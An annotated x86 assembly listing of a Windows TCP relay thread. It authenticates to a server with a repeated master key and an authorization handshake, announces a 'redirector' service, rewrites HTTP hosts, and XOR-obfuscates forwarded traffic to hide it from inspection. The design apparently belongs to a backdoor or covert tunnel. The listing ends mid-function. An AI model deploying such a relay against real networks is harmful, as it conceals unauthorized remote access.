@ThreadProc:
// Thread entry for one TCP relay endpoint (stdcall thread proc: [ebp+4] = AArgs).
// Register roles for the whole routine (ebx/esi/edi are callee-saved under Win32
// stdcall, so they survive every API call below):
//   esi = AArgs (ThreadArgs record, layout in the block comment below)
//   ebx = handshake round counter    edi = byte count / poll counter / cursor
// Never returns: every exit path ends in ExitThread, so no frame is torn down.
mov ebp,esp
sub esp,00Ch // three dword locals, see layout below
{
-00C - LBuffer:Pointer  (also reused as a 4-byte receive scratch during the handshake)
-008 - LBytes:Cardinal
-004 - LSocket:TSocket  (not referenced anywhere in this routine)
+004 - AArgs:Pointer
+000 AArgs.ThreadArgs.MainItem:PTcpItem
+004 AArgs.ThreadArgs.OtherItem:PTcpItem
+008 AArgs.ThreadArgs.ThreadType:Cardinal
+00C AArgs.ThreadArgs.Events:Longint
+010 AArgs.ThreadArgs.EventHandle:THandle
+014 AArgs.ThreadArgs.Active:Boolean
+018 AArgs.ThreadArgs.Host.sin_family:Word
+01A AArgs.ThreadArgs.Host.sin_port:Word
+01C AArgs.ThreadArgs.Host.sin_addr:TInAddr
+020..+024 AArgs.ThreadArgs.Host.sin_zero:array[0..7] of Char
+028 AArgs.ThreadArgs.Socket
+02C AArgs.ThreadArgs.Connected - client only
NOTE(review): the code below also dereferences [esi+038h] and [esi+06Ch] as pointers
to records (fields +01C, +024, +028, +02C) that this layout does not describe -
extend the layout once those records are identified.
}
mov esi,[ebp+004h] // esi = AArgs for the rest of the thread
mov eax,[esi+008h] // ThreadType
test eax,eax
jnz @ThreadProc_redir // non-zero: relay side, wait for the partner item to connect
mov eax,[esi+02Ch] // Connected
test eax,eax
jnz @ThreadProc_client_connected // already connected: skip connect + handshake
// WSAConnect(Socket, @Host, SOCK_ADDR_SIZE, nil, nil, nil, nil)
push eax // lpGQOS = nil (eax is 0 here)
push eax // lpSQOS = nil
push eax // lpCalleeData = nil
push eax // lpCallerData = nil
push SOCK_ADDR_SIZE
lea eax,[esi+018h] // @Host (sockaddr_in inside AArgs)
push eax
push dword ptr [esi+028h] // Socket
call WSAConnect
inc eax // SOCKET_ERROR (-1) -> 0
jz @ThreadProc_error // NOTE(review): exits without CloseSocket, unlike @ThreadProc_closesock
// @EventSelect(Socket, @EventHandle): local helper, not shown here; 0 = failure
lea eax,[esi+010h]
push eax
push dword ptr [esi+028h]
call @EventSelect
// mov [esi+02Ch],eax
test eax,eax
jz @ThreadProc_error
{}
// Drain whatever is already readable before starting the key handshake.
// recv's return value is not checked; the loop ends when FIONREAD reports 0.
@ThreadProc_preinit_read:
push dword ptr [esi+028h]
call @BytesToRecv // eax = readable bytes (0 on error as well)
test eax,eax
jz @ThreadProc_init_start
mov edi,eax // edi = byte count, survives the calls below
push eax
push LMEM_FIXED
call LocalAlloc // LocalAlloc(LMEM_FIXED, edi)
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv // recv(Socket, LBuffer, edi, 0) - result discarded
push dword ptr [ebp-00Ch]
call LocalFree
jmp @ThreadProc_preinit_read
// Handshake: up to 20 attempts (ebx counts down from 14h).
@ThreadProc_init_start:
push 014h
pop ebx // ebx = 20 attempts
@ThreadProc_init_start_send:
//newfeature modulos
// Repeat count for this attempt: 1 + number of d in 3..6 that divide (21 - ebx),
// i.e. the 1-based attempt index. esi is borrowed as the divisor and restored after.
push esi
push 003h
pop esi // esi = 3 (first divisor)
xor edi,edi
inc edi // edi = 1 (base repeat count)
@ThreadProc_init_start_modulos:
push 015h
pop eax
sub eax,ebx // eax = attempt index 1..20
xor edx,edx
div esi // edx = attempt mod divisor, eax = quotient (<= 6)
test edx,edx
setz al // al = 1 if divisible; relies on the small quotient leaving the upper bytes of eax zero
add edi,eax
inc esi
cmp esi,007h
jb @ThreadProc_init_start_modulos // divisors 3,4,5,6
pop esi // esi = AArgs again
{ //newfeature nil key
mov eax,offset MasterNil
push 000h
push MASTER_KEY_LEN
push eax
push dword ptr [esi+028h]
call send
//\newfeature nil key
}
mov ecx,edi // ecx = number of times to send the key
xor edi,edi // edi = 0 = send flags
// send(Socket, @MasterKey, MASTER_KEY_LEN, 0) ecx times; return values are not checked.
@ThreadProc_init_start_send_loop:
push ecx
//\newfeature modulos
mov eax,offset MasterKey
// xor edi,edi newfeature modulos
push edi
push MASTER_KEY_LEN
push eax
push dword ptr [esi+028h]
call send
pop ecx //newfeature modulos
loop @ThreadProc_init_start_send_loop //newfeature modulos
// Wait for the server's first byte: up to 8 event waits (edi = 9, decremented first).
push 009h
pop edi
@ThreadProc_wait_for_srvinit:
dec edi
jz @ThreadProc_wait_for_srvinit_failed
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents // local helper, not shown; eax = event mask, 0 = nothing pending
test eax,eax
jz @ThreadProc_wait_for_srvinit
mov ecx,eax
and eax,FD_READ
jnz @ThreadProc_srvinit
and ecx,FD_CLOSE
jnz @ThreadProc_closesock
jmp @ThreadProc_wait_for_srvinit
@ThreadProc_srvinit:
// Receive one byte into the zeroed dword at [ebp-00Ch]; the dword then equals the byte.
lea eax,[ebp-00Ch]
push 000h
pop dword ptr [eax] // LBuffer dword := 0
push 000h
push 001h //newfeature was 004
push eax
push dword ptr [esi+028h]
call recv // recv(Socket, @LBuffer, 1, 0)
inc eax
jz @ThreadProc_closesock // SOCKET_ERROR; a 0 return (peer closed) falls through with the dword still 0
mov eax,[ebp-00Ch]
cmp eax,BSC_INIT_REQ_1
jz @ThreadProc_srv_init_1
//newfeature
// Unexpected byte: drain the rest of the pending input, then count this attempt as failed.
push dword ptr [esi+028h]
call @BytesToRecv
test eax,eax
jz @ThreadProc_wait_for_srvinit_failed
mov edi,eax
push eax
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_wait_for_srvinit_failed
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv // result discarded
push dword ptr [ebp-00Ch]
call LocalFree
//\newfeature
@ThreadProc_wait_for_srvinit_failed:
dec ebx // one handshake attempt used up
jnz @ThreadProc_init_start_send
jmp @ThreadProc_closesock
@ThreadProc_srv_init_1:
// Got BSC_INIT_REQ_1: drain any trailing bytes (96 ms pause between reads) before the
// request/response exchange. NOTE(review): if anything was drained, [ebp-00Ch] now holds
// the freed LBuffer pointer and @ThreadProc_srv_init_cmp interprets that value as the
// first request code - TODO confirm the server never sends more than one byte here.
push dword ptr [esi+028h]
call @BytesToRecv
test eax,eax
jz @ThreadProc_srv_init_cmp
mov edi,eax
push eax
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv // result discarded
push dword ptr [ebp-00Ch]
call LocalFree
push 060h
call Sleep // 96 ms
jmp @ThreadProc_srv_init_1
@ThreadProc_srv_init_cmp:
// Request/response exchange: up to 20 rounds (ebx = 15h, decremented first).
// Each round acts on the last received byte, held in [ebp-00Ch].
push 015h
pop ebx
@ThreadProc_srv_init_cmp_loop:
dec ebx
jz @ThreadProc_closesock
mov eax,[ebp-00Ch]
test eax,eax
jnz @ThreadProc_srv_init_2
// Nothing received this round: (re)send BSC_INIT_RES_1.
push BSC_INIT_RES_1
pop dword ptr [ebp-00Ch]
jmp @ThreadProc_srv_init_send
@ThreadProc_srv_init_2:
// Dispatch on (byte - BSC_INIT_REQ_1): 0, 2, 4 -> reply with byte+1; 6 -> handshake done;
// anything else -> close.
sub eax,BSC_INIT_REQ_1
jz @ThreadProc_srv_init_x
dec eax
dec eax
jz @ThreadProc_srv_init_x
dec eax
dec eax
jz @ThreadProc_srv_init_x
dec eax
dec eax
jz @ThreadProc_srv_init_sucend
jmp @ThreadProc_closesock
@ThreadProc_srv_init_x:
inc dword ptr [ebp-00Ch] // reply code = request code + 1
@ThreadProc_srv_init_send:
// send(Socket, @LBuffer, 1, 0) - result not checked
push 000h
push 001h
lea eax,[ebp-00Ch]
push eax
push dword ptr [esi+028h]
call send
push 000h
pop dword ptr [ebp-00Ch] // clear the scratch dword before the next 1-byte recv
push 019h
pop edi // edi = 25 -> up to 24 waits for the reply
@ThreadProc_wait_for_sign:
dec edi
jz @ThreadProc_srv_init_cmp_loop // no reply: back to the round loop, which retransmits
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents
test eax,eax
jz @ThreadProc_wait_for_sign
and eax,FD_READ
jz @ThreadProc_wait_for_sign // FD_CLOSE is not acted on here; the counter bounds the wait
push 000h
push 001h
lea eax,[ebp-00Ch]
push eax
push dword ptr [esi+028h]
call recv // recv(Socket, @LBuffer, 1, 0) - result not checked
jmp @ThreadProc_srv_init_cmp_loop
@ThreadProc_srv_init_sucend:
// Handshake done: send the 4-byte dword at [[esi+038h]+02Ch] as-is.
// NOTE(review): this is the same dword @ThreadProc_decrypt_buf_read later uses as the
// XOR key seed, so the key crosses the wire in clear during the handshake.
push 000h
push 004h
mov eax,[esi+038h]
lea eax,[eax+02Ch]
push eax
push dword ptr [esi+028h]
call send
push 050h
pop edi // edi = 80 -> up to 79 polls of 25 ms (~2 s) for the authorization byte
@ThreadProc_wait_for_auth:
dec edi
jz @ThreadProc_closesock
push 019h
call Sleep // 25 ms
push 000h
push 001h
lea eax,[ebp-00Ch]
push eax
push dword ptr [esi+028h]
call recv // 1 byte into the low byte of LBuffer (upper bytes still 0 from the earlier clear)
inc eax
jz @ThreadProc_wait_for_auth // SOCKET_ERROR (presumably WSAEWOULDBLOCK): poll again
mov eax,[ebp-00Ch]
cmp eax,BSC_AUTHORIZATION_OK
jnz @ThreadProc_closesock
// Announce the service type: one byte BSC_SERVICE_REDIRECTOR ...
push 000h
push 001h
lea eax,[ebp-00Ch]
mov byte ptr [eax],BSC_SERVICE_REDIRECTOR
push eax
push dword ptr [esi+028h]
call send
// ... followed by 8 bytes from [[esi+038h]+01Ch] (record not described in the layout above).
push 000h
push 008h
mov eax,[esi+038h]
lea eax,[eax+01Ch]
push eax
push dword ptr [esi+028h]
call send
push 001h
pop dword ptr [esi+02Ch] // Connected := True
//xxxxxx
jmp @ThreadProc_client_connected
@ThreadProc_redir:
// Relay side: poll every 25 ms until the partner item reports Connected.
// NOTE(review): no timeout and no Active check - this loop never ends if the partner
// never connects.
mov edi,[esi+004h] // edi = OtherItem
@ThreadProc_redir_waitforcon:
push 019h
call Sleep
mov eax,[edi+02Ch] // OtherItem.Connected (assumes PTcpItem shares the layout above)
test eax,eax
jz @ThreadProc_redir_waitforcon
@ThreadProc_client_connected:
// Main relay loop: stop as soon as either side is no longer Active.
mov eax,[esi+014h] // Active
test eax,eax
jz @ThreadProc_closesock
mov eax,[esi+004h]
mov eax,[eax+014h] // OtherItem.Active
test eax,eax
jz @ThreadProc_closesock
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents
test eax,eax
jz @ThreadProc_client_connected
mov [esi+00Ch],eax // Events := mask
and eax,FD_READ
jnz @ThreadProc_read
@ThreadProc_af_read:
mov eax,[esi+00Ch]
and eax,FD_CLOSE
jnz @ThreadProc_closesock
jmp @ThreadProc_client_connected
@ThreadProc_read:
// ThreadType 0: this side receives length-prefixed obfuscated frames and decodes them;
// any other value: it reads raw bytes, obfuscates them and forwards them as frames.
mov eax,[esi+008h]
test eax,eax
jz @ThreadProc_decrypt
@ThreadProc_crypt:
// Read everything currently readable (FIONREAD) into a freshly allocated buffer.
push dword ptr [esi+028h]
call @BytesToRecv
test eax,eax
jz @ThreadProc_af_read
mov edi,eax
push eax
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax
push 000h
push edi
push eax
push dword ptr [esi+028h]
call recv // recv(Socket, LBuffer, edi, 0) - count bounded by the allocation size
mov [ebp-008h],eax // LBytes := bytes received (or -1)
inc eax
jz @ThreadProc_read_free // SOCKET_ERROR: free the buffer and return to the event loop
// [esi+06Ch] points at a record not in the layout above; when its +024h field is 2 the
// payload first goes through ReplaceHostInHTTPPacket(@LBuffer, @LBytes, [rec+028h]),
// which presumably may replace the buffer and its length (both are passed by address).
mov ecx,[esi+06Ch]
mov eax,[ecx+024h]
dec eax
dec eax
jnz @ThreadProc_docrypt
push dword ptr [ecx+028h]
lea eax,[ebp-008h]
push eax
lea eax,[ebp-00Ch]
push eax
call ReplaceHostInHTTPPacket
@ThreadProc_docrypt:
// In-place obfuscation: byte := (byte xor lowbyte(key)) + 65h, key rotated right by 1
// per byte. The key stream repeats every 32 bytes and the key is a plain dword in
// memory - this hides traffic from casual inspection but is not encryption.
mov edi,[ebp-00Ch] // edi = read/write cursor (stosb advances it)
mov ecx,[ebp-008h] // ecx = byte count
mov edx,[esi+06Ch]
mov edx,[edx+02Ch] // edx = key
// jmp @ThreadProc_crypt_done  (disabled: would forward the payload unobfuscated)
test ecx,ecx
jz @ThreadProc_read_loop
@ThreadProc_crypt_loop:
mov al,[edi]
xor al,dl
add al,065h
stosb
ror edx,001h
loop @ThreadProc_crypt_loop
// @ThreadProc_crypt_done:  (disabled, see above)
// Frame header: send the 4-byte LBytes (in clear) on the partner socket; the body follows
// in @ThreadProc_read_loop.
push 000h
push 004h
lea eax,[ebp-008h]
push eax
mov eax,[esi+004h]
mov eax,[eax+028h] // OtherItem.Socket
push eax
call send
jmp @ThreadProc_read_loop
@ThreadProc_decrypt:
// Read the 4-byte frame length into LBytes. A short read or a 0 return is not detected:
// whatever is then in LBytes (stale or partial) is used as the length.
push 000h
push 004h
lea eax,[ebp-008h]
push eax
push dword ptr [esi+028h]
call recv
mov edi,[ebp-008h] // edi = frame length as supplied by the peer
inc eax //breakpoint
jz @ThreadProc_closesock
(*//bugfix
mov [ebp-008h],0FABCDEFAh
push 000h
push 004h
lea eax,[ebp-008h]
push eax
push dword ptr [esi+028h]
call send
mov [ebp-008h],edi
push 000h
push 004h
lea eax,[ebp-008h]
push eax
push dword ptr [esi+028h]
call send
inc eax
jz @ThreadProc_closesock
//\bugfix*)
test edi,edi
jz @ThreadProc_af_read
// NOTE(review): edi comes straight from the peer with no upper bound, so one 4-byte
// header can request an allocation of up to 4 GiB - cap it before LocalAlloc.
push edi
push LMEM_FIXED
call LocalAlloc
test eax,eax
jz @ThreadProc_closesock
mov [ebp-00Ch],eax // LBuffer = frame buffer
mov [ebp-008h],edi // LBytes = frame length (fixed from here on)
mov edx,eax // edx = write cursor; edi = bytes still missing
@ThreadProc_decrypt_wait:
push edx // edx is caller-saved: keep the cursor across the call
push dword ptr [esi+010h]
push dword ptr [esi+028h]
call @WaitForEvents
pop edx
mov [esi+00Ch],eax
test eax,eax
jz @ThreadProc_decrypt_wait
and eax,FD_READ
jnz @ThreadProc_decrypt_read_buf
@ThreadProc_decrypt_af_read:
mov eax,[esi+00Ch]
and eax,FD_CLOSE
jnz @ThreadProc_read_free // peer closed mid-frame: drop the partial frame
jmp @ThreadProc_decrypt_wait
@ThreadProc_decrypt_read_buf:
// recv(Socket, cursor, remaining, 0): the count is the bytes still missing, so the read
// cannot run past the end of the frame buffer.
push edx
push 000h
push edi
push edx
push dword ptr [esi+028h]
call recv
pop edx
inc eax
jz @ThreadProc_read_free // SOCKET_ERROR
dec eax // eax = bytes received (0 if the peer closed: nothing advances, FD_CLOSE ends it above)
add edx,eax
sub edi,eax
jnz @ThreadProc_decrypt_af_read // frame not complete yet
@ThreadProc_decrypt_buf_read:
// Inverse of @ThreadProc_crypt_loop: byte := (byte - 65h) xor lowbyte(key), key ror 1 per byte.
// Key seed is [[esi+038h]+02Ch] (the dword sent in clear by @ThreadProc_srv_init_sucend);
// note the encode side reads its key from [[esi+06Ch]+02Ch] instead.
mov edi,[ebp-00Ch]
mov ecx,[ebp-008h]
mov edx,[esi+038h]
mov edx,[edx+02Ch]
// jmp @ThreadProc_read_loop  (disabled: would forward the frame without decoding)
test ecx,ecx
jz @ThreadProc_read_free
@ThreadProc_decrypt_loop:
mov al,[edi]
sub al,065h
xor al,dl
stosb
ror edx,001h
loop @ThreadProc_decrypt_loop
nop
@ThreadProc_read_loop:
// Forward LBuffer (LBytes bytes) to OtherItem.Socket.
// NOTE(review): the 252 ms sleep per chunk caps throughput at a few chunks per second.
// NOTE(review): after a partial send LBytes is reduced but the buffer pointer is not
// advanced, so the retry resends the start of the buffer and drops its tail.
//bugfixsleep
push 0FCh
call Sleep
//\bugfixsleep
push 000h
push dword ptr [ebp-008h]
push dword ptr [ebp-00Ch]
mov eax,[esi+004h]
mov eax,[eax+028h] // OtherItem.Socket
push eax
call send
inc eax
jz @ThreadProc_read_free // SOCKET_ERROR
dec eax
sub [ebp-008h],eax
jnz @ThreadProc_read_loop
@ThreadProc_read_free:
push dword ptr [ebp-00Ch]
call LocalFree
jmp @ThreadProc_af_read
@ThreadProc_closesock:
//bugfixsleep
push 0019h
call Sleep // 25 ms
//\bugfixsleep
push dword ptr [esi+028h]
call CloseSocket //breakpoint
@ThreadProc_error:
// Also reached directly from the WSAConnect / @EventSelect failures above, i.e. without
// the socket having been closed.
push 000h
call ExitThread
@BytesToRecv:
// function BytesToRecv(s: TSocket): Cardinal  (one dword stack arg, ret 4)
// Returns the number of bytes readable on s via WSAIoctl(FIONREAD), or 0 when WSAIoctl
// fails (SOCKET_ERROR is folded into 0 by the inc below, so callers cannot tell
// "no data" from "error"). Clobbers eax, ecx.
xor eax,eax
push eax // [esp+0Ch] after the 4 pushes: receives lpcbBytesReturned
push eax // [esp+08h]: receives the FIONREAD result (lpvOutBuffer)
push eax // [esp+04h]: becomes WSAIoctl arg 9, lpCompletionRoutine = nil
push eax // [esp+00h]: becomes WSAIoctl arg 8, lpOverlapped = nil
lea ecx,[esp+00Ch]
push ecx // lpcbBytesReturned
push 004h // cbOutBuffer
sub ecx,004h
push ecx // lpvOutBuffer
push eax // cbInBuffer = 0
push eax // lpvInBuffer = nil
push FIONREAD // dwIoControlCode
push [esp+02Ch] // s: 10 pushes (28h bytes) now sit below the return address, so the arg is at esp+2Ch
call WSAIoctl // stdcall: pops its 9 args, leaving esp at the two result slots
inc eax
jz @BytesToRecv_end // SOCKET_ERROR -> eax = 0
mov eax,[esp] // readable byte count
@BytesToRecv_end:
pop ecx // discard the two result slots
pop ecx
ret 004h
@PeekMessages:
push ebp
mov ebp,esp